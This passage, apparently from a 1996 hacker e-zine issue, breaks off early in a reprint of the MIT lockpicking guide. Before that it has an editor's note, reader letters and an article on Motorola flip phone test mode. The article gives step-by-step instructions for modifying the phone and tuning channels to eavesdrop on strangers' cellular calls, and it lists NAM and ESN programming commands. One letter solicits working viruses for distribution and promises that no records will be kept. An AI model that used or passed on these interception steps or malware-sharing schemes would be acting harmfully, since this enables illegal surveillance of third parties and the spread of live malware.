* * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, February, 1996 ... Edited by: Revolution .... ... ------------------- .... Hackers Forums ... ------------------- From the editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution Letters . . . . . . . . . . . . . . . . . . . . . . . . .Hackers Worldwide ... ... ------------------- .... Technology ... ------------------- Motorola Flip Phone Fun . . . . . . . . . . . . . . . . . . . . . . Treker MIT Guide to Lockpicking . . . . . . . . . . . . . . . . . . .Ted the Tool Yet Another Login Spoof . . . . . . . . . . . . . . . . . . Brent Barnhill ... -------------------- .... Politics ... -------------------- A Request for Action . . . . . . . . . . . . . . . . . . . . . .Jim Warren Cyberspace Makes the Difference . . . . . .Voters Telecommunications Watch The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution ----------------------------------------------------------------- ------------ copyright 1996 by Mike Scanlon All articles remain the property of their authors, and may be reprinted with their permission. This zine may be reprinted freely as a whole electronically, for hard copy rights mail the editor. HACKERS is published monthly by Mike Scanlon, to be added to the subscription list or to submit articles mail mrs3691@hertz.njit.edu ----------------------------------------------------------------- ------------- * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #1 of 8 ... From the Editor .POW! Just like the sound effects of an old Batman rerun, Hackers is back at you with another issue of gutwrenching telecommunications adventure. Throw on your night vision goggles and don't forget your polka dotted box, cover me honey, I'm going in! .The last couple of weeks hoodlums at NJIT have been seen passing the early semester blues by red boxing to Brazil, and ordering long distance coverage and 500 number service to the pay phones in the surrounding area. Some of these hoodlums appear to have obvious behavioral problems. .But I've been steering clear of all that, concentrating on the mag. This issue has a few tech articles, along with a favorite of mine, although it is from 1991 it is mostly still valid, the MIT guide to Lockpicking. Politically, alot has been going on in cyberspace to be happy about, but much more work is still to be done. More information concerning the state of the legislation involving the internet will be in next month's issue. .For those of you who haven't heard, Defcon will be happening this July, the 26th through the 28th, in Las Vegas. More info on this can be had at http://www.defcon.com. There is also a voice bridge set up by the promoters of the event at (801) 855-3326. I have a VMB set up at that number, box 2537, if anybody wants to leave me a message, and prefers not to use the answering machine I have set up for the purpose. But some people are impressed by those types of things. .Anyway, I am STILL looking for somebody to handle the bug and virus of the month columns, if anyone finds the time or interest, drop me a line. I haven't made the 2600 meeting as I promised, but in the future I will try to make it. Other projects I've been talking about every month but never gotten around to doing: putting up a decent website, and setting up a telnetable site. Both of these I promise to look into by....summer. :) .Well, I've been spending the better part of my waking hours trying to think of cool things I could do to increase reader participation in the zine. I came up with one thing we could do for next issue. A reader's write contest! For next issue, as this is "Hackers" magazine, in 2 billion words or less, describe the best hack you have ever heard of, or even better, the best hack that you have ever pulled off. The winner will receive an adequate no-prize that I haven't decided upon yet...but all the submissions will be printed, so hopefully we'll have some comic relief next issue. So write yours today, and let's see some submissions! Mrs3691@hertz.njit.edu. ......- Revolution * * * * * * * * * * * * * * * * * * * * As always, the standard disclaimer applies. All of these articles are provided for informational purposes only, Mike Scanlon and the respective authors cannot be held accountable for any illegal acts they are used to commit. * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #2 of 8 .... Letters >From 0200717@ACAD.NWMISSOURI.EDUWed Jan 17 12:49:37 1996 Date: Thu, 11 Jan 1996 11:58:49 -0600 (CST) From: RYAN ECCLES <0200717@ACAD.NWMISSOURI.EDU> To: mrs3691@hertz.njit.edu Subject: Hackers Revolution, .Please include the following request in the next edition of Hackers. I will be writing a cd-rom soon. I would like to write a cd-rom containing viruses. This cd-rom can be used to load viruses to your computer in order to test the effectiveness of your current virus scanner. Unfortunately, I don't have 650MB of viruses. I know that most of you have a few viruses laying around, and I would like them. I don't have the largest account in the world either, so snail mail is the preffered method of transport. If you have some viruses please send email to 0200717@acad.nwmissouri.edu and let me know the name of the virus (if known) and the size of the virus (if known). If I don't have the virus or viruses I will email my address to you. Please pkzip the file place it on a 3.5 disk or an iomega zip disk. All disks will be returned upon request. Contributors may receive a copy of the cd for 15 (slightly over the cost of a blank cd rom...keep in mind it takes a couple hours to write a cd correctly...and it may take time to get 650 MB of viruses from you.) All info from contributors will be confidential unless otherwise requested NO RECORDS WILL BE KEPT! This keeps both you and I out of trouble. REMEMBER THIS DISK IS ONLY PROVIDED FOR SECURITY PURPOSES. I prefer to have working viruses, and descriptions of the viruses as well as what they do. Thanks HACKERS, HACK ON! ----------------------------------------------------------------- -------------- >From wyle@max.tiac.netMon Jan 29 19:59:26 1996 Date: Sat, 27 Jan 1996 12:56:52 -0501 (EST) From: Wyld Wyle To: michael r scanlon cis stnt Subject: Re: Hackers #5 Dear Mike, I don't know if this is of any help to you but I have a number that will tell you what Telephone number you are calling from, ie. I f you where calling from a pay phone or a phone in an office and you wanted to know what that number is you would call, also good for if you want the number of a line that a computer is using for a data line. Also bear in mind that I am from Boston and I don't know if it will work anywhere else, but it is a 1-800 number so it might, It is 1-800-my-ani-is, after you dial you will hear a beeping noise(the beep will continue, just type in the code, the code is either 22, or 20, I forget, well hope this is of some help to you. .....-Wyle P.S E-mail me back and let me know if it worked! [Wyle emailed me again and told me the code is 220. Although this number works nationally, there are three digit numbers to call from every region that will also give you your ANI, find yours out from your local BBS. Here in Newark, and I think all of 201, the code is 958. ......- Revolution ----------------------------------------------------------------- -------------- From: IN%"hardguy@continuity.it.com.au" 26-JAN-1996 21:55:20.52 To: IN%"scanlonr@delphi.com" CC: Subj: Article update In reference to Aftermath's article on Beigeboxing In Australia (issue #4, file #4 of 9). The number to call (from anywhere) to check what number you are calling from is 1114. 1115 also works hopefully. 111x also produces linesman test tones. -h ----------------------------------------------------------------- -------------- * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #3 of 8 .... .. *************************** .. * Motorola Flip Phone Fun * .. * By * .. * Treker * .. *************************** So you got yourself a new Motorola Flip Phone, and now that you have talked to someone goin 100 down the highway you want to have some real fun. Well one way is to use the Test Mode commands, these are used to test the phone and set some of it's features. To use the test mode commands you must first get into test mode, now to do this with your average flip phone is pretty simple and here's how: 1.Take off your battery 2.Look at the back side of the phone where the battery used to be and locate the three notches at the bottom. 3.Two prongs should be sticking out from the side notches.(See Diagram) ... The three prongs (notice the middle does not have a prong sticking out of it) (also notice that on the battery there is also three contacts but none of them stick out) ... ... --- --- --- ... | | | | | | | | ... | / | | | | / | ... | | | | | | ... --- --- --- 4.The prongs are where the battery contacts connect with the phone. 5.To get into test mode you must create a prong for the middle notch so makes contact with the middle contact on the battery. 6.To make the prong you could use Tin-Foil and just stick it into the middle notch so it makes contact with the battery. Any condutable piece of metal will make a good notch just as long as it makes contact with the battery. 7.Now replace the battery and turn on the phone if it lights up normally it did not work, so take off your battery and adjust your prong so it definatly makes contact with the battery. But if you see abunch of numbers flashing on the display, you are in test mode. Notice: If the phone dosen't even light up it's probably because the . prong is touching one of the other contacts, so just adjust . you middle prong until it works. Now that you are in Test Mode it's time for some commands. Now to use the commands you must press the # key and you will see: ....US ' This means you are ready to enter commands! I will give you a complete list below of the commands but I would like to spend a little time on one in perticular, test mode command #11. This is used to change cell channels and through this you can moniter other calls!! Yes you read me correct, you can listen to other people going 100 down the freeway. To get it working you must first unmute audio or the conversations will be too faint, so enter test mode command 08 at the prompt and you should hear some noise in the speaker. Then to change the channels, enter 11xxxx. Where x equals the channal you want to listen to, in my area most of the action happans in the 380 area, so I would enter: 11380 at the prompt. But the best way to find a conversation is just to scan around randomly. In a big city you should get at least a couple of conversations. A channel without a conversation just sounds like static, just thaught you should know. Below is the complete(up to date is a better word) list of test mode commands some of them are useful and some of them are useless but beware some of these commands could screw the phone up some good. ----------------------------CUT-HERE----------------------------- ----- # Enter Test Command Mode 00# no function 01# Restart (Re-enter DC power start-up routine.) On TDMA telephones, this command has the same effect as pressing the PWR button. 02# Display Current Telephone Status (This is a non-altering version of the STATUS DISPLAY. On a 14 character display, all the information is shown. On a 7 character display only the information on the second line of a 14 character display is shown. On a 10 character display, all the information on the second line of a 14 charcter display plus the last three characters of the first line are shown.) STATUS DISPLAY, ALTERNATES BETWEEN: AAA BBB AAA = Channel Number (decimal) BBB = RSSI reading for channel CDEFGHI are as follows: C = SAT frequency (0=5970, 1=6000, 2=6030, 3=no channel lock) D = Carrier (0=off, 1=on) E = Signalling tone (0=off, 1=on) F = Power attenuation level (0 through 7) G = Channel mode (0=voice channel, 1=control channel) H = Receive audio mute (0=unmuted, 1=muted) I = Transmit audio mute (0=unmuted, 1=muted) Press * to hold display and # to end. 03# Reset Autonomous Timer. This command results in the reset of the autonomous timer but does not provide any test function on these models. 04# Initializes Telephone to Standard Default Conditions: Carrier Off, Power Level 0, Receiver Audio Muted, Transmit Audio Muted, Signalling Tone Off, SAT Off, Resetting of Watch-Dog Timer Enabled, DTMF and Audio Tones Off, Audio Path Set to Speaker 05# TX Carrier On (Key Transmitter) 06# TX Carrier Off 07# RX Audio Off (Mute Receiver Audio) 08# RX Audio On (Unmute Receiver Audio) 09# TX Audio Off 10# TX Audio On 11(Ch.No.)# Set Tranceiver to Channel xxxx (Receive and Transmit in Decimal; . accepts 1, 2, 3, or 4 digits) . see end of file for more info on this command 12x# Set Power Step to x; (0,1-7) 0=Maximum Power (3 Watts) 7=Minimum Power Out 13# Power Off (Shuts off the radio) 14# 10 kHz Signalling Tone On 15# 10 kHz Signalling Tone Off 16# Setup (Transmits a five word RECC message; each of the five words will be "FF00AA55CC33." Transmitter de-keys at the end of the message.) 17# Voice (Transmits a two word REVC message; each of the two words will be "FF00AA55CC33." Transmitter de-keys at the end of the message.) 18# C-Scan (Allows for entry of as many as 5 negative SID's for each NAM.) Newer Motorola phones are equipped with a feature called C-Scan, this is an option along with the standard A/B system selections. C-Scan allows the phone to be programed with up to five inhibited system ID's per NAM. This is designed to prevent the phone from roaming onto specified non-home systems and therefore reduce "accidental" roaming fees. 1. C-Scan can only be programed from test mode, power phone up with the . relevant test mode contact grounded (see above). 2. Press # to access test mode. 3. Press 18#, the phone will display "0 40000". 4. Enter the first inhibited system ID and press *. Continue to enter additional system ID's if required. After the 5th entry the phone will display "N2". Press * to continue and add system ID's for NAM 2 as required. 5. If an incorrect entry is made (outside the range of 00000-32767) the . display will not advance, press CLR and re-enter. Use a setting of . 40000 for any un-needed locations. 6. When the last entry has been made press * to store and press # to exit, . turn off power. or [**Phones without the C-Scan option used this command to SEND NAM.**] 18# SEND NAM. Display shows AA BB. Where AA=Address and BB=Data. Displays the contents of the NAM, one address at a time, advanced by pressing the * key. The following data is contained in NAM. The test is exited by depressing the # key. SIDH Sec. Code OPT. (1,2,&3) MIN MIN1, MIN2 FCHNA SCM FCHNB IPCH NDED ACCOLC CHKSUM GIM 19# Display Software Version Number (4 digits displayed as year and week) NOTE: Entering commands 20# through 23# or 27# causes the tranceiver to begin a counting sequence or continous transmission as described below. In order to exit from the commands to enter another test command, the # key must be depressed; all other key depressions are ignored. 20# Receive control channel messages counting correctable and uncorrectable errors. When the command starts, the number of the command will be displayed in the upper-right corner of the display. Entering a # key will terminate the command and display two three-digit numbers in the display. The first number is the number of correctable errors and the second is the uncorrectable errors. 21# Received voice channel messages counting correctable and uncorrectable errors. When the command starts, the number of the command will be displayed in the upper right-hand corner of the display. Entering a # key terminates the command and will display two three-digit numbers in display. The first is the number of correctable errors and the second is the uncorrectable errors. 22# Receive control channel messages counting word sync sequence. When the command starts, the number of the command will be displayed in the upper right-hand corner of the display. Entering a # key will terminate the command and display the number of word sync sequences in the display. 23# Receive voice channel messages counting word sync sequences. When the command starts, the number of the command will be displayed in the upper right-hand corner of the display. Entering a # key will terminate the command and display the number of word sync sequences in the display. 24# Receive control channel data and display the majority voted busy/idle bit. 0=idle 1=busy 25x# SAT On When x=0, SAT=5970HZ ......x=1, SAT=6000HZ ......x=2, SAT=6030HZ 26# SAT Off 27# Transmit Data (Transmits continuous control channel data. All words will be "FF00AA55CC33." When the command starts, '27' will be displayed in the right side of the display. Entering a # key will terminate the command. The transmitter de-keys when finished.) 28# Activate the high tone (1150 Hz +/- 55 Hz) 29# De-activate the high tone 30# Activate the low tone (770 Hz +/- 40 Hz) 31# De-activate the low tone 32# Clear (Sets non-volatile memory to zeroes or factory default. This command will affect all counters, all repertory memory including the last number called stack, and all user programmable features including the setting of System Registration. It does not affect the ESN, NAM, phasing data, or lock code. This takes a minute or so. DO NOT TURN OFF THE TELEPHONE WHILE THIS IS SHOWING '32' ON THE DISPLAY. WAIT UNTIL THE NORMAL SERVICE LEVEL DISPLAY RESUMES!) 33x# Turn on DTMF for x (1-9, *, 0, #, plus the single tones) .Where x=1 697 Hz + 1209 Hz 10 697 Hz ..2 697 Hz + 1336 Hz 11 770 Hz ..3 697 Hz + 1477 Hz 12 852 Hz ..4 770 Hz + 1209 Hz 13 941 Hz ..5 770 Hz + 1336 Hz 14 1150 Hz (not used in cellular) ..6 770 Hz + 1477 Hz 15 1209 Hz ..7 852 Hz + 1209 Hz 16 1336 Hz ..8 852 Hz + 1336 Hz 17 1477 Hz ..9 852 Hz + 1477 Hz 18 1633 Hz (not used in cellular) ..* 941 Hz + 1209 Hz ..0 941 Hz + 1336 Hz ..# 941 Hz + 1477 Hz 34# Turn DTMF Off 35# Display RSSI ("D" Series Portable Only) or 35x# Set Audio Path to x x=0, V.S.P Microphone (Applies to mobiles only.) ... x=1, Speaker ... x=2, Alert ... x=3, Handset ... x=4, Mute ... x=5, External Telephone (Applies to Portables Only) ... x=6, External Handset (Applies to NEWER Portables) 36nnn# Scan (TDMA Telephones only. Scans the primary control channels and attempts to decipher the forward data stream. The display will show PASS1 if the strongest control channel was accessed, PASS2 if the second strongest was accessed, and FAIL if no control channel could be accessed.) (nnn=Scan speed in milliseconds). Tunes from channel 1 to 666 in order. Entering a * pauses the scan and displays current Channel Number and RSSI reading (AAA=Channel Number and BBB=RSSI Reading). When scan speed is 300 milliseconds or greater, the current status is displayed during the scan; when less than 300 milliseconds the status is displayed only during pause. Entering * during a pause causes the scan to resume. Entering # aborts the scan and leaves the mobile tuned to the current channel. During this command only the * and # keys are recognized. 37# Sets Low Battery Threshold. Usage: #37#x# where x is any number from 1 to 255. If set to 1, the Low Battery indicator will come up when the phone is powered on. If set to 255, it may never come up. 38# Display ESN (Displays ESN in four steps, two hexadecimal digits at a time in a for digit display. The decimal shows the address, 00 through 03 as the first two digits, and two digits of the ESN as the last two digits. Use the 'G' to step through the entire hexadecimal ESN.) Compander OFF ("D" Series Portables) or 38# SND-SNM. Display shows AA BB. Where AA=Address;BB=Data. Send the SNM to the display. All 32 bytes of the SNM will be displayed, one byte at a time. The byte address will be displayed in the upper right-hand corner and the contents of that address will be displayed in the hex. The * key is used to step through the address similar to the SEND-NAM (18#) command. 39# Compander ON ("D" Series Portables) or 39# RCVSU. Receive one control channel word. When the word is received it is displayed in hex. This command will be complete when a control channel word is received or when the # key is entered to abort the command. 40# RCVVC. Receive one voice channel word. When the word is received it is displayed in hex. This command will be complete when a voice channel word is received or when the # key is entered to abort the command. 41# Enables Diversity (On F19CTA... Series only.) 42# Disables Diversity (On F19CTA... Series only.) 43# Disable Diversity USE T/R ANTENNA (On F19CTA... Series only.) USE R ANTENNA (On D.M.T./ Mini TAC) 44# Disable Diversity USE R ANTENNA (On F19CTA... Series only.) USE T/R ANTENNA (On D.M.T./ Mini TAC) 45# Display Current RSSI (Displayed as a three-digit decimal number) 46# Display Cumulative Call Timer 47x# Set RX Audio level to X (For F19CTA ...Series Tranceivers) .... X=0, Lowest Volume .... X=6, Highest Volume .... X=7, mute .... Normal setting is 4. (For D.M.T./ Mini TAC Tranceivers) .... X=0, Lowest Volume .... X=7, Highest Volume .... Normal setting is 4. (For TDMA Tranceivers and F09F... Series and Higher Portables) .... X=0, Lowest Volume .... X=15, Highest Volume .... Normal setting is 2 to 4. (On TDMA .... Tranceivers and Micro TAC portables, .... settings 8 through 15 are for DTMF .... applications only.) 48# Side Tone On. Use this command in conjunction with 350# to test the entire audio path in hands-free applications. 49# Side Tone Off 50# Maintenance data is transmitted and test results displayed: PASS=received data is correct FAIL 1=2second timeout, no data rec. FAIL 2=received data is incorrect 51# Test of mobile where maintenance data is transmitted and looped back. Display is as follows: PASS=looped-back data is correct FAIL 1=2 second timeout, no looped-back data FAIL 2=looped-back data is incorrect 52x# SAT Phase Adjustment. A decimal value that corresponds to phase shift compensation in 4.5 degree increments. Compensation added to inherent phase shift in tranceiver to achieve a total of 0 degrees phase shift. Do NOT enter any values except those shown below. 0 degrees = 0 121.5 degrees = 59 243.0 degrees = 86 4.5 = 1 126.0 = 60 247.5 = 87 9.0 = 2 130.5 = 61 252.0 = 112 13.5 = 3 135.0 = 62 256.5 = 113 18.0 = 4 139.5 = 63 261.0 = 114 22.5 = 5 144.0 = 40 265.5 = 115 27.0 = 6 148.5 = 41 270.0 = 116 31.5 = 7 153.0 = 42 274.5 = 117 36.0 = 16 157.5 = 43 279.0 = 118 40.5 = 17 162.0 = 44 283.5 = 119 45.0 = 18 166.5 = 45 288.0 = 120 49.5 = 19 171.0 = 46 292.5 = 121 54.0 = 20 175.5 = 47 297.0 = 122 58.5 = 21 180.0 = 64 301.5 = 123 63.0 = 22 184.5 = 65 306.0 = 124 67.5 = 23 189.0 = 66 310.5 = 125 72.0 = 48 193.5 = 67 315.0 = 126 76.5 = 49 198.0 = 68 319.5 = 127 81.0 = 50 202.5 = 69 324.0 = 104 85.5 = 51 207.0 = 70 328.5 = 105 90.0 = 52 211.5 = 71 333.0 = 106 94.5 = 53 216.0 = 80 337.5 = 107 99.0 = 54 220.5 = 81 342.0 = 108 103.5 = 55 225.0 = 82 346.5 = 109 108.0 = 56 229.5 = 83 351.0 = 110 112.5 = 57 234.0 = 84 355.5 = 111 117.0 = 58 238.5 = 85 360.0 = 70 . 53# Enable scrambler option, when equipped. 54# Disable scrambler option, when equipped. 55# Display/Program N.A.M. (Test Mode Programming) TEST MODE PROGRAMING: Assuming you have completed one of the above steps correctly the phone will wake up in test mode when you turn the power on. When you first access test mode the phone's display will alternate between various status information that includes the received signal strength and channel number. The phone will operate normally in this mode. You can now access Service Mode by pressing the # key, the display will clear and a ' will appear. Use the following procedure to program the phone: 1. Enter 55# to access programing mode. 2. The * key advances to the next step. (NOTE that test mode programing . does NOT have step numbers, each time you press the * key the phone . will display the next data entry). 3. The CLR key will revert the display to the previously stored data. 4. The # key aborts programing at any time. 5. To complete programing you must scroll through ALL entries until a ' . appears in the display. 6. Note that some entries contain more digits than can be displayed by the . phone, in this case only the last part of the data can be seen. TEST MODE PROGRAMING DATA: STEP# #OF DIGITS/RANGE DESCRIPTION 01 00000 - 32767 SYSTEM ID 02 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 1 BELOW 03 10 DIGITS MIN (AREA CODE & TEL#) 04 2 DIGITS STATION CLASS MARK 05 2 DIGITS ACCESS OVERLOAD CLASS 06 2 DIGITS GROUP ID (10 IN USA) 07 6 DIGITS SECURITY CODE 08 3 DIGITS LOCK CODE 09 3 DIGITS SERVICE LEVEL (LEAVE AT 004) 10 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 2 BELOW 11 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 3 BELOW 12 0333 OR 0334 INITIAL PAGING CHANNEL 13 0333 "A" SYSTEM IPCH 14 0334 "B" SYSTEM IPCH 15 3 DIGIT NUMBER PAGING CHANNEL (021 IN USA) 16 8 DIGIT BINARY OPTION PROGRAMING, SEE NOTE 4 BELOW Steps 01 through 06 and 12 will repeat for NAM 2 if the second phone number bit has been enabled in step 11. NOTES: Take care with Motorola's use of "0" and "1". Some options use "0" to enable, some use "1". These are eight digit binary fields used to select the following options: 1. (step 02 above, suggested entry is: 11101001 for "A" system, 10101001 . for "B" sys) . Digit 1: Local use mark, 0 or 1. . Digit 2: Preferred system, 0 or 1. . Digit 3: End to end (DTMF) dialing, 1 to enable. . Digit 4: Not used, enter 0. . Digit 5: Repertory (speed) dialing, 1 to enable. . Digit 6: Auxiliary (horn) alert, 1 to enable. . Digit 7: Hands free (VSP) auto mute, 1 to enable (mutes outgoing hands .. free audio until the MUTE key is pressed). . Digit 8: Min mark, 0 or 1. 2. (step 10 above, suggested entry is: 00000100) . Digits 1 - 4: Not used in USA, enter 0. . Digit 5: Single system scan, 1 to enable (scan A or B system only, .. determined by bit 2 of step 02. Set to "0" to allow user the .. option). . Digit 6: Super speed dial, 1 to enable (pressing N, or NN SND will .. dial the number stored in memory location NN). . Digit 7: User selectable service level, 0 to enable (allows user to .. set long distance/memory access dialing restrictions). . Digit 8: Lock function, 0 to enable (allows user to lock/un-lock the .. phone, if this is set to 1 the phone can not be locked). 3. (step 11 above, suggested entry is: 00000000) . Digit 1: Handset programing, 0 to enable (allows access to programing .. mode without having to enter test mode). . Digit 2: Second phone number (not all phones), 1 to enable. . Digit 3: Call timer access, 0 to enable. . Digit 4: Auto system busy redial, 0 to enable. . Digit 5: Speaker disable, 1 to enable (use with select VSP units only, .. do not use with 2000 series mobiles). . Digit 6: IMTS/Cellular, 1 to enable (rarely used). . Digit 7: User selectable system registration, 0 to enable. . Digit 8: Dual antennae (diversity), 1 to enable. 4. (step 16 above, suggested entry is: 0011010 for portable and 0011011 . for mobile units) . Digit 1: Not used, 0 only. . Digit 2: Not used, 0 only . Digit 3: Continuous DTMF, 1 to enable (software version 8735 and later) . Digit 4: 8 hour time-out, 0 to enable (software version 8735 and later) . Digit 5: Not used, 0 only. . Digit 6: Failed page indicator, 0 to enable (phone beeps when an . incoming call is detected but signal conditions prevent . completion of the call). . Digit 7: Portable scan, 0 for portable, 1 for mobile units. 56# no function 57x# Call Processing Mode .. x=0, AMPS .. x=1, NAMPS .. x=2-4, RESERVED .. x=5, TDMA signalling .. x=6, TDMA signalling with loopback before decoding .. x=7, TDMA signalling with loopback voice after decoding .. x=8, TDMA signalling with loopback FACCH after decoding .. x=9, TDMA forced synchronization 58# Compander On (Audio compressor and expander) (See 39#) 59# Compander Off (Audio compressor and expander) (See 38#) 60# no function 61# ESN Transfer (For Series I D.M.T./Mini TAC only) 62# Turn On Ringer Audio Path 63# Turn Off Ringer Audio Path 64#-65# no function 66# Identity Transfer (Series II Tranceivers and some Current Shipping Portables) 67# no function 68# Diaplay FLEX and Model Information 69# Used with Identity Transfer 70# Abbreviated field transmitter audio deviation command, for tranceivers with FCC ID ABZ89FT5668. 71# Abbreviated field power adjustment command, for tranceivers with FCC ID ABZ89FT5668. 72# Field audio phasing commands. 73# Field power adjustment command. 74#-99# no function * * * * * * * * * * * * * * * * * * * * ... -= H A C K E R S =- ... Issue #6, File #4 of 8 ... MIT Guide to Lockpicking .... Ted the Tool As I promised, here is the edited test to the MIT GIUDE TO LOCKSMITHING. It's in the next 10 messages. Enjoy! The file's available for download from my BBS as MITGUIDE.ZIP. Can be F'Reqed. The editing corrected the collosal number of spelling and grammatical errors I found. Regards, Poor Richard... +................................................................ ...+ . richard.bash@f68.n105.z1.fidonet.org Combat Arms BBS . . Also: dickbash@rigel.cs.pdx.edu P.O. Box 913 . . Fido 1:105/68 Portland, OR 97201 . . Voice: 1-503-223-3160 BBS:1-503-221-1777 Shop: 1-503-640-3209 . +................................................................ ...+ ....Combat Arms BBS .... P.O. Box 913 ... Portland, Oregon 97207-0913 ... Voice: (503) 223-3160 ... BBS: (503) 221-1777 .... Fido 1:105/68 ... November 10, 1993 ... MIT Guide to Lockpicking .... by .... Ted the Tool ... February 14, 1992 .... Distribution ... Copyright 1987, 1991 ... Theodore T. Tool. All ... right reserved. . Permission to reproduce this document on a non-profit basis is granted provided that this copyright and distribution notice is included in full. The information in this booklet is provided for educational purposes only. ... August 1991 revision. .... Contents 1 It's Easy. . . . . . . . . . . . . . . . . . . . . . . . . . . 2 How a Key Opens a Lock . . . . . . . . . . . . . . . . . . . . 3 The Flatland Model . . . . . . . . . . . . . . . . . . . . . . 4 Basic Picking & The Binding Defect . . . . . . . . . . . . . . 5 The Pin Column Model . . . . . . . . . . . . . . . . . . . . . 6 Basic Scrubbing. . . . . . . . . . . . . . . . . . . . . . . . 7 Advanced Lockpicking . . . . . . . . . . . . . . . . . . . . . . 7.1 Mechanical Skills . . . . . . . . . . . . . . . . . . . . . 7.2 Zen and the Art of Lockpicking. . . . . . . . . . . . . . . 7.3 Analytic Thinking . . . . . . . . . . . . . . . . . . . . 8 Exercises. . . . . . . . . . . . . . . . . . . . . . . . . . . . 8.1 Exercise 1: Bouncing the pick . . . . . . . . . . . . . . . 8.2 Exercise 2: Picking Pressure. . . . . . . . . . . . . . . . 8.3 Exercise 3: Picking Torque. . . . . . . . . . . . . . . . . 8.4 Exercise 4: Identifying Set Pins. . . . . . . . . . . . . . 8.5 Exercise 5: Projections . . . . . . . . . . . . . . . . . 9 Recognizing and Exploiting Personality Traits. . . . . . . . . . 9.1 Which Way To Turn . . . . . . . . . . . . . . . . . . . . . 9.2 How Far to Turn . . . . . . . . . . . . . . . . . . . . . . 9.3 Gravity . . . . . . . . . . . . . . . . . . . . . . . . . . 9.4 Pins Not Setting. . . . . . . . . . . . . . . . . . . . . . 9.5 Elastic Deformation . . . . . . . . . . . . . . . . . . . . 9.6 Loose Plug. . . . . . . . . . . . . . . . . . . . . . . . . 9.7 Pin Diameter. . . . . . . . . . . . . . . . . . . . . . . . 9.8 Beveled Holes and Rounded pins. . . . . . . . . . . . . . . 9.9 Mushroom Driver Pins. . . . . . . . . . . . . . . . . . . . 9.10 Which Way To Turn . . . . . . . . . . . . . . . . . . . . . 9.11 Which Way To Turn . . . . . . . . . . . . . . . . . . . . . 9.12 Which Way To Turn . . . . . . . . . . . . . . . . . . . . . 9.13 Disk Tumblers . . . . . . . . . . . . . . . . . . . . . . 10 Final Remarks. . . . . . . . . . . . . . . . . . . . . . . . . A Tools. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A.1 Pick Shapes . . . . . . . . . . . . . . . . . . . . . . . . A.2 Street cleaner bristles . . . . . . . . . . . . . . . . . . A.3 Bicycle spokes. . . . . . . . . . . . . . . . . . . . . . . A.4 Brick Strap . . . . . . . . . . . . . . . . . . . . . . . B Legal Issues . . . . . . . . . . . . . . . . . . . . . . . . . .... INTRODUCTION Hello, . My pseudonym is Ted The Tool. I wrote the "MIT Guide To Lockpicking." Over the years I have followed this list and seen many requests for the Guide in electronic form. For various reasons I did not want to post it. . Over the summer I changed my mind, and decided to post it as a postscript file. A postscript file would allow many people to print it, while still allowing me some artistic control over derivative works. I had planned to make several improvements before posting it, but that seems moot now. . So, I will be posting the original postscript file as a series of six e-mail message. Each message is about 62,000 bytes long so they will pass through most mail forwarders. The messages form a uuencoded, compressed, postscript file. To reconstruct the guide, 1) remove the mail headers from the messages, 2) concatenate them together (Unix cat command) to make a file called MITLockGuide.ps.Z.uu, 3) run the uudecode command on the resulting file to create the file MITLockGuide.ps.Z, and 4) run uncompress on that file to create MITLockGuide.ps, which you can send to a printer with the lpr command. The result will be a file called MITLockGuide.ps with a length of 818540 bytes and sum of "32380 800." . I would like to find some repositories for the Guide. If you have an FTP site, and are willing to keep a copy of the guide, please do so, and send me a message telling me its location, so I can tell other people who want a copy of it. I do not want to get into the business of mailing out individual copies via e-mail. I would like to make it easy for other people to find via archie, gopher, etc. If you are keeping a copy, please use the name MITLockGuide.ps (or MITGuide.ps if you have 8 character limits on file names). . I would appreciate the following help: - Convert the Guide to other formats so it can be . printed on non-postscript printers. Please let me know . about it, and post a message to alt.locksmithing. - Convert the figures into a format that a modern . graphics program can manipulate. The figures were made . using the Illustrate program on a Symbolics . LispMachine (it was a nice machine in its day :-). . Please send the result back to me, and if you wish, . post it to the net. - Write new subsections on lock defects and how to . exploit them for different kinds of pin-tumbler locks. - Write a chapter on disk tumbler locks that includes a . discussion of the "pick-resistant" modifications (vee- . shaped notch in the disk that has a similar effect as . a mushroom-shaped driver. - Write a chapter on Best locks that explains the . removable core feature (with pictures please), and . describes how to exploit the very high tolerances that . are used in manufacturing these locks. - Expand the appendix on legal issues to cover all 50 . states. Ideally, I would like a chart that showed the . requirements necessary to legally carry lockpicks in . each state. - Describe other practice exercises that help people . learn the skills of lockpicking. - Write similar guides for other types of locks. For . example, there could be a guide for ACE-type tubular . locks, and one for Simplex push-button locks. In my . mind, the Guide was intended to just cover pin-tumbler . locks, though the title is bigger than that. Perhaps, . if the other guides are small and there authors wanted . to, they could be added as chapters to the Guide. - Any other additions you would like. . I would like the Guide to become the locksmithing equivalent of GNU Emacs, which is something that is freely distributed that many people contribute to. This is a great opportunity for you to share your experience with other people who share your interest in locks. Sincerely, Ted The Tool . --------------------------------------------------------- . To find out more about the anon service, send mail to help@anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use, etc. to admin@anon.penet.fi. .... Chapter 1 .... IT'S EASY . The big secret of lockpicking is that it's easy. Anyone can learn how to pick locks. . The theory of lockpicking is the theory of exploiting mechanical defects. There are a few basic concepts and definitions but the bulk of the material consists of tricks for opening locks with particular defects or characteristics. The organization of this manual reflects this structure. The first few chapters present the vocabulary and basic information about locks and lockpicking. There is no way to learn lockpicking without practicing, so one chapter presents a set of carefully chosen exercises that will help you learn the skills of lockpicking. The document ends with a catalog of the mechanical traits and defects found in locks and the techniques used to recognize and exploit them. The first appendix describes how to make lockpicking tools. The other appendix presents some of the legal issues of lockpicking. . The exercises are important. The only way to learn how to recognize and exploit the defects in a lock is to practice. This means practicing many times on the same lock as well as practicing on many different locks. Anyone can learn how to open desk and filing cabinet locks, but the ability to open most locks in under thirty seconds is a skill that requires practice. . Before getting into the details of locks and picking, it is worth pointing out that lockpicking is just one way to bypass a lock, though it does cause less damage than brute force techniques. In fact, it may be easier to bypass the bolt mechanism than to bypass the lock. It may also be easier to bypass some other part of the door or even avoid the door 